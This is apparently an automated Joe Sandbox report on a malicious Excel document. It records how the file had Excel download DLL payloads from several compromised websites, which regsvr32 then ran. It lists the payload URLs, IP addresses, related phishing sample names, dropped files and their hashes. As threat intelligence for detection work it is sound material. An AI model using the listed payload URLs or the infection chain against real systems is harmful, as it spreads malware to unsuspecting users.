                            		stainedglassexpress.comUnited States
                            		46562TOTAL-SERVER-SOLUTIONSUSfalse

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:632101
                            Start date and time: 23/05/202209:49:072022-05-23 09:49:07 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 8m 57s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:Datei_26744565.xls
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:14
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winXLS@17/18@4/5
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 57.8% (good quality ratio 31.8%)
                            • Quality average: 33.7%
                            • Quality standard deviation: 37.7%
                            HCA Information:
                            • Successful, ratio: 95%
                            • Number of executed functions: 38
                            • Number of non-executed functions: 250
                            Cookbook Comments:
                            • Found application associated with file extension: .xls
                            • Adjust boot time
                            • Enable AMSI
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210
                            • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            09:50:23API Interceptor3775x Sleep call for process: regsvr32.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            85.114.142.153DETAILS 25922194612.xlsGet hashmaliciousBrowse
                            • kolejleri.com/wp-admin/REvup/
                            documento_2005.xlsGet hashmaliciousBrowse
                            • kolejleri.com/wp-admin/REvup/
                            Lkd_2005.xlsGet hashmaliciousBrowse
                            • kolejleri.com/wp-admin/REvup/
                            SCAN_89357809.xlsGet hashmaliciousBrowse
                            • kolejleri.com/wp-admin/REvup/
                            103.171.181.223DETAILS 25922194612.xlsGet hashmaliciousBrowse
                            • learnviaonline.com/wp-admin/qGb/
                            documento_2005.xlsGet hashmaliciousBrowse
                            • learnviaonline.com/wp-admin/qGb/
                            Lkd_2005.xlsGet hashmaliciousBrowse
                            • learnviaonline.com/wp-admin/qGb/
                            SCAN_89357809.xlsGet hashmaliciousBrowse
                            • learnviaonline.com/wp-admin/qGb/
                            QON7521489768 invoice.zip_br_ Password_ 747jm87hy_br_.lnkGet hashmaliciousBrowse
                            • learnviaonline.com/wp-admin/f1tisSTS/
                            ACH Payment Advice.zip_br_ Password_ 4434OTTNU_br_.lnkGet hashmaliciousBrowse
                            • learnviaonline.com/wp-admin/f1tisSTS/
                            Invoice # 96995631 X#9932993 05829.zip_br_ Password_ vh98bsv4_br_.lnkGet hashmaliciousBrowse
                            • learnviaonline.com/wp-admin/f1tisSTS/
                            QON7521489768 invoice.zip_br_ Password_ 747jm87hy_br_.lnkGet hashmaliciousBrowse
                            • learnviaonline.com/wp-admin/f1tisSTS/
                            107.189.3.39DETAILS 25922194612.xlsGet hashmaliciousBrowse
                            • milanstaffing.com/images/D4TRnDubF/
                            documento_2005.xlsGet hashmaliciousBrowse
                            • milanstaffing.com/images/D4TRnDubF/
                            Lkd_2005.xlsGet hashmaliciousBrowse
                            • milanstaffing.com/images/D4TRnDubF/
                            SCAN_89357809.xlsGet hashmaliciousBrowse
                            • milanstaffing.com/images/D4TRnDubF/

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            milanstaffing.comDETAILS 25922194612.xlsGet hashmaliciousBrowse
                            • 107.189.3.39
                            documento_2005.xlsGet hashmaliciousBrowse
                            • 107.189.3.39
                            Lkd_2005.xlsGet hashmaliciousBrowse
                            • 107.189.3.39
                            SCAN_89357809.xlsGet hashmaliciousBrowse
                            • 107.189.3.39
                            stainedglassexpress.comDETAILS 25922194612.xlsGet hashmaliciousBrowse
                            • 66.71.247.68
                            documento_2005.xlsGet hashmaliciousBrowse
                            • 66.71.247.68
                            Lkd_2005.xlsGet hashmaliciousBrowse
                            • 66.71.247.68
                            SCAN_89357809.xlsGet hashmaliciousBrowse
                            • 66.71.247.68
                            kolejleri.comDETAILS 25922194612.xlsGet hashmaliciousBrowse
                            • 85.114.142.153
                            documento_2005.xlsGet hashmaliciousBrowse
                            • 85.114.142.153
                            Lkd_2005.xlsGet hashmaliciousBrowse
                            • 85.114.142.153
                            SCAN_89357809.xlsGet hashmaliciousBrowse
                            • 85.114.142.153
                            learnviaonline.comDETAILS 25922194612.xlsGet hashmaliciousBrowse
                            • 103.171.181.223
                            documento_2005.xlsGet hashmaliciousBrowse
                            • 103.171.181.223
                            Lkd_2005.xlsGet hashmaliciousBrowse
                            • 103.171.181.223
                            SCAN_89357809.xlsGet hashmaliciousBrowse
                            • 103.171.181.223
                            QON7521489768 invoice.zip_br_ Password_ 747jm87hy_br_.lnkGet hashmaliciousBrowse
                            • 103.171.181.223
                            ACH Payment Advice.zip_br_ Password_ 4434OTTNU_br_.lnkGet hashmaliciousBrowse
                            • 103.171.181.223
                            Invoice # 96995631 X#9932993 05829.zip_br_ Password_ vh98bsv4_br_.lnkGet hashmaliciousBrowse
                            • 103.171.181.223
                            QON7521489768 invoice.zip_br_ Password_ 747jm87hy_br_.lnkGet hashmaliciousBrowse
                            • 103.171.181.223

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            MYLOC-ASIPBackboneofmyLocmanagedITAGDEDETAILS 25922194612.xlsGet hashmaliciousBrowse
                            • 85.114.142.153
                            documento_2005.xlsGet hashmaliciousBrowse
                            • 85.114.142.153
                            Lkd_2005.xlsGet hashmaliciousBrowse
                            • 85.114.142.153
                            SCAN_89357809.xlsGet hashmaliciousBrowse
                            • 85.114.142.153
                            http://thesportsgrail.comGet hashmaliciousBrowse
                            • 85.114.159.93
                            Advice FTT5378393.exeGet hashmaliciousBrowse
                            • 93.186.201.208
                            z4ehq74vWOGet hashmaliciousBrowse
                            • 85.114.198.102
                            ST10501909262401.exeGet hashmaliciousBrowse
                            • 93.186.201.208
                            https://bullant-security.w3spaces.com/Get hashmaliciousBrowse
                            • 85.114.159.118
                            whvMLs1u4xGet hashmaliciousBrowse
                            • 89.163.194.115
                            Cancellation-507660980$-May5.xlsbGet hashmaliciousBrowse
                            • 5.199.136.61
                            Cancellation-507660980$-May5.xlsbGet hashmaliciousBrowse
                            • 5.199.136.61
                            https://sidebar.io/out?url=https%3A%2F%2Fwww.creativebloq.com%2Fnews%2Fworst-logos-2022%3Fref%3DsidebarGet hashmaliciousBrowse
                            • 85.114.159.118
                            https://ma-ilpanel.gamemodx.cf/auth.php?add=keith@steinborn.comGet hashmaliciousBrowse
                            • 85.114.159.93
                            oo9A7GRneRGet hashmaliciousBrowse
                            • 83.136.82.32
                            http://quick-adviser.com/how-do-i-stop-negative-values-in-java/Get hashmaliciousBrowse
                            • 80.82.217.90
                            https://rainbownnutbolt47-65.w3spaces.com/RAINBOW_NUT_AND_BOLT_april_13_2022.pdf?bypass-cache=68928506Get hashmaliciousBrowse
                            • 85.114.159.93
                            805YbfoCnN.xlsGet hashmaliciousBrowse
                            • 89.163.146.219
                            rRoIuoRpEQGet hashmaliciousBrowse
                            • 46.228.205.63
                            https://topcookingstories.com/library/lecture/read/40097-what-legendary-pets-can-you-get-out-of-a-cracked-egg#0Get hashmaliciousBrowse
                            • 85.114.159.93
                            AARNET-AS-APAustralianAcademicandResearchNetworkAARNeDETAILS 25922194612.xlsGet hashmaliciousBrowse
                            • 103.171.181.223
                            jew.arm7Get hashmaliciousBrowse
                            • 103.162.253.58
                            x86Get hashmaliciousBrowse
                            • 139.230.225.83
                            B2CP7AnrdzGet hashmaliciousBrowse
                            • 144.205.100.51
                            EhCzyqLrUkGet hashmaliciousBrowse
                            • 103.189.218.58
                            meerkat.arm7-20220522-2050Get hashmaliciousBrowse
                            • 139.230.83.233
                            KSA_67537835353.xlsxGet hashmaliciousBrowse
                            • 103.167.92.57
                            hiZKhinsQyGet hashmaliciousBrowse
                            • 103.161.25.109
                            Cff7khwHQFGet hashmaliciousBrowse
                            • 103.165.24.252
                            x8lFIk8wYKGet hashmaliciousBrowse
                            • 103.180.7.199
                            Un93F0RX3zGet hashmaliciousBrowse
                            • 103.64.107.175
                            F4Bl65ZbQfGet hashmaliciousBrowse
                            • 103.182.254.153
                            o9flt31DtmGet hashmaliciousBrowse
                            • 139.230.225.98
                            sora.armGet hashmaliciousBrowse
                            • 103.179.236.167
                            DQR5IGyfauGet hashmaliciousBrowse
                            • 103.33.61.96
                            phantom.armGet hashmaliciousBrowse
                            • 103.171.158.160
                            wiDR0DkFXyGet hashmaliciousBrowse
                            • 138.7.88.121
                            2205117369.xlsxGet hashmaliciousBrowse
                            • 103.176.113.85
                            Ponuda garik doo.xlsxGet hashmaliciousBrowse
                            • 103.167.92.57
                            winlogon.exeGet hashmaliciousBrowse
                            • 103.176.113.85

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dllDETAILS 25922194612.xlsGet hashmaliciousBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllDETAILS 25922194612.xlsGet hashmaliciousBrowse
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dllDETAILS 25922194612.xlsGet hashmaliciousBrowse

                                  Created / dropped Files

                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                  Download File
                                  Process:C:\Windows\System32\regsvr32.exe
                                  File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                  Category:dropped
                                  Size (bytes):61480
                                  Entropy (8bit):7.9951219482618905
                                  Encrypted:true
                                  SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                  MD5:B9F21D8DB36E88831E5352BB82C438B3
                                  SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                  SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                  SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...

                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                  Download File
                                  Process:C:\Windows\System32\regsvr32.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):330
                                  Entropy (8bit):3.126909434994818
                                  Encrypted:false
                                  SSDEEP:6:kKFOd/qoJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:4WkPlE99SNxAhUesE1
                                  MD5:6F6E56068B5F93A7328A3E3A7C1DF737
                                  SHA1:1057DF246C738374E3C5B86A77F13E800239CCB3
                                  SHA-256:F1A45EB0EFF076D3390202214578B9536CA72FD2FDBD8AAC1D667A7F74FCE1A8
                                  SHA-512:61571956F80935CAA866D3ACE0C7079A4E4DA1AA784B49108B97A32778A88CE666F6FC2E79DCC6F989D50A0BB9C122235CA2BC3A93D7E2C1CEB700452BEFBA11
                                  Malicious:false
                                  Preview:p...... .........M..n..(....................................................... ........3k/"[......(...........(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.3.3.6.b.2.f.2.2.5.b.d.8.1.:.0."...

                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:downloaded
                                  Size (bytes):371200
                                  Entropy (8bit):7.1527203772082135
                                  Encrypted:false
                                  SSDEEP:6144:hlNuuXQASByX7YxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Qy/BJ7rGTK/V3
                                  MD5:828A9B1007DC45671D8A58E240C7C973
                                  SHA1:8214993BB314D0F4C1889E507F88BEEB3F6E5B63
                                  SHA-256:B59F16EE5E524814316A8BE8EF54EA02F9A496267555E65EEB585E4ADE85FFEC
                                  SHA-512:7519B39DD811C3578E0002D5C4F35B2A6855092978004ECB2CA0030C1550AA3D38B346F83C43EB286AB9E1BF6209050078286DDB8BFEA5F1D5DC3EFCAAFEEEEF
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 59%
                                  Joe Sandbox View:
                                  • Filename: DETAILS 25922194612.xls, Detection: malicious, Browse
                                  IE Cache URL:http://stainedglassexpress.com/classes/05SkiiW9y4DDGvb6/
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d....{.b.........." .................5....................................................@....................................................P.................................................................................... ...............................text............................... ..`.rdata..4.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:downloaded
                                  Size (bytes):371200
                                  Entropy (8bit):7.152718217466625
                                  Encrypted:false
                                  SSDEEP:6144:hlNuuXQASByX7LxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7xy/BJ7rGTK/V3
                                  MD5:646CA94D40F268C87215FFEA9FD0E826
                                  SHA1:22E67EB4D6E4B5F09E3DE5A6021462ADCF99FE75
                                  SHA-256:52769F52F479F16D61C449D307C7FD1FA23FAA0B5589500E0967CD7955CA93D6
                                  SHA-512:5AE522EB99551146F84F9AA94F270083CEDC1BB8DF26697E15D57FCF7AF126766F8F18ED4FFAC06DF46D88E07C08A8523CD8A4187AF3DD8173BAF35272DE794B
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                  • Antivirus: ReversingLabs, Detection: 61%
                                  Joe Sandbox View:
                                  • Filename: DETAILS 25922194612.xls, Detection: malicious, Browse
                                  IE Cache URL:http://milanstaffing.com/images/D4TRnDubF/
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d....{.b.........." .................5....................................................@....................................................P.................................................................................... ...............................text............................... ..`.rdata..4.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:downloaded
                                  Size (bytes):371200
                                  Entropy (8bit):7.152704988682108
                                  Encrypted:false
                                  SSDEEP:6144:hlNuuXQASByX7DxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Zy/BJ7rGTK/V3
                                  MD5:5A9E3E501F04B27A38BCA881A68A1785
                                  SHA1:9573AB24845B8FA1408F0381E64A40A5CC2A879E
                                  SHA-256:306C6E39327DAD93262B4531BA5B95B35F4541C70B0D4A6FE5F1DC8C96C86D8C
                                  SHA-512:FB6BABA1B27D7019DA35D2CF854A111DEE6574196CC9E2022956ABDB3717B5C2321DC8811533205B3AA87A047AC6D927252688AAFAA802AFB989E38568C1EC58
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 59%
                                  Joe Sandbox View:
                                  • Filename: DETAILS 25922194612.xls, Detection: malicious, Browse
                                  IE Cache URL:http://kolejleri.com/wp-admin/REvup/
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d....{.b.........." .................5....................................................@....................................................P.................................................................................... ...............................text............................... ..`.rdata..4.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:downloaded
                                  Size (bytes):371200
                                  Entropy (8bit):7.1527177644825635
                                  Encrypted:false
                                  SSDEEP:6144:hlNuuXQASByX7fxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7ly/BJ7rGTK/V3
                                  MD5:C9FD6F4A594719F21F310D8D0A2E55BB
                                  SHA1:D999195E150304EF6FA4AE5362FDB70D0457429B
                                  SHA-256:E654F14F3A98027669FD428597A2B4967B5276BDB94DA7770189E791FD98FC50
                                  SHA-512:BC7F62214F70076027355858367004A019FBE18EE9404AC58ECC550C9EF5F2B3DB6A01E2B60A33E55B5FE323D52CD1BA0C455AA2C99E058140F9ABD5AF5B8E8E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 59%
                                  IE Cache URL:http://learnviaonline.com/wp-admin/qGb/
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d....{.b.........." .................5....................................................@....................................................P.................................................................................... ...............................text............................... ..`.rdata..4.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\CabE354.tmp

                                  Download File
                                  Process:C:\Windows\System32\regsvr32.exe
                                  File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                  Category:dropped
                                  Size (bytes):61480
                                  Entropy (8bit):7.9951219482618905
                                  Encrypted:true
                                  SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                  MD5:B9F21D8DB36E88831E5352BB82C438B3
                                  SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                  SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                  SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                  Malicious:false
                                  Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...

                                  C:\Users\user\AppData\Local\Temp\TarE355.tmp

                                  Download File
                                  Process:C:\Windows\System32\regsvr32.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):162196
                                  Entropy (8bit):6.301436092020807
                                  Encrypted:false
                                  SSDEEP:1536:Nga6crtilgCyNY2Ip/5ib6NWdm1wpzru2RPZz04D8rlCMiB3XlMc:Na0imCy/dm0zru2RN97MiVGc
                                  MD5:E721613517543768F0DE47A6EEEE3475
                                  SHA1:3FFC13E3157CF6EB9E9CCAB57B9058209AF41D69
                                  SHA-256:3163B82D1289693122EF99ED6C3C1911F68AA2A7296907CEBF84C897141CED4E
                                  SHA-512:E097CAB58C5E390FDC2DB03A59329A548A60069804487828B70519A403622260E57F10B09D9DDAEEB3C31491FE32221FB67965C490771A3D42E45EBB8BE26587
                                  Malicious:false
                                  Preview:0..y...*.H.........y.0..yz...1.0...`.H.e......0..i...+.....7.....i.0..i.0...+.....7........SiU[v...220418211447Z0...+......0..i.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o

                                  C:\Users\user\AppData\Local\Temp\~DF510C5EA216433379.TMP

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):28672
                                  Entropy (8bit):3.440608621024532
                                  Encrypted:false
                                  SSDEEP:768:cDRKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+V0qs9s1X8:cVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UU
                                  MD5:A406AA1773C3292E4769B91791FEA502
                                  SHA1:42B4155CFEAC777DD81ED4D6847BD29DF7D63810
                                  SHA-256:1035D746F889351ED4258FBFC62EEDD75409A3CF4DEC52D81CE1C162CB5210DC
                                  SHA-512:CCFC0521C6B9D6C67911139131AF133D7C7047CE3485526E7898B598ABB370587EA7DB8D006BE52274E92A744C5D812110FB4AD141D07C2B5966820AE3B83AA4
                                  Malicious:false
                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\Desktop\Datei_26744565.xls

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Fri May 20 07:48:11 2022, Security: 0
                                  Category:dropped
                                  Size (bytes):69120
                                  Entropy (8bit):6.427895409240265
                                  Encrypted:false
                                  SSDEEP:1536:aVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+y9s1a6YG2jzQ0viPvDNHh9ef:4Kpb8rGYrMPe3q7Q0XV5xtezE8vG8UMN
                                  MD5:2E3EE528F4AC7B711AC8208B6BDDFB93
                                  SHA1:2D4869AFC48027FF0AFF0D54F05EAFBC9E1EABB9
                                  SHA-256:2D7C2C28D4EABF382B240C500160D93B5DCFA8CC052F78EDAA6BFDBD45B827E7
                                  SHA-512:9D69B21D38F93F2203DCB9E2196F80EA87CC62D12BD8C3B9A66F80A3E221C8B146EA4F66E75B8A30E75FFCF1EADBF283A487EA2F0F43D156ADC4FD9C7E20C65C
                                  Malicious:true
                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....userTH B.....a.........=.................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......

                                  C:\Users\user\uxevr1.ocx

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):371200
                                  Entropy (8bit):7.1527177644825635
                                  Encrypted:false
                                  SSDEEP:6144:hlNuuXQASByX7fxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7ly/BJ7rGTK/V3
                                  MD5:C9FD6F4A594719F21F310D8D0A2E55BB
                                  SHA1:D999195E150304EF6FA4AE5362FDB70D0457429B
                                  SHA-256:E654F14F3A98027669FD428597A2B4967B5276BDB94DA7770189E791FD98FC50
                                  SHA-512:BC7F62214F70076027355858367004A019FBE18EE9404AC58ECC550C9EF5F2B3DB6A01E2B60A33E55B5FE323D52CD1BA0C455AA2C99E058140F9ABD5AF5B8E8E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 59%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d....{.b.........." .................5....................................................@....................................................P.................................................................................... ...............................text............................... ..`.rdata..4.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                  C:\Users\user\uxevr2.ocx

                                  Download File
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):371200
                                  Entropy (8bit):7.152704988682108
                                  Encrypted:false
                                  SSDEEP:6144:hlNuuXQASByX7DxoJcXy16qFHJ7wwD1w3pq6jTK/V9OT0u:hlNu9ASByX7Zy/BJ7rGTK/V3
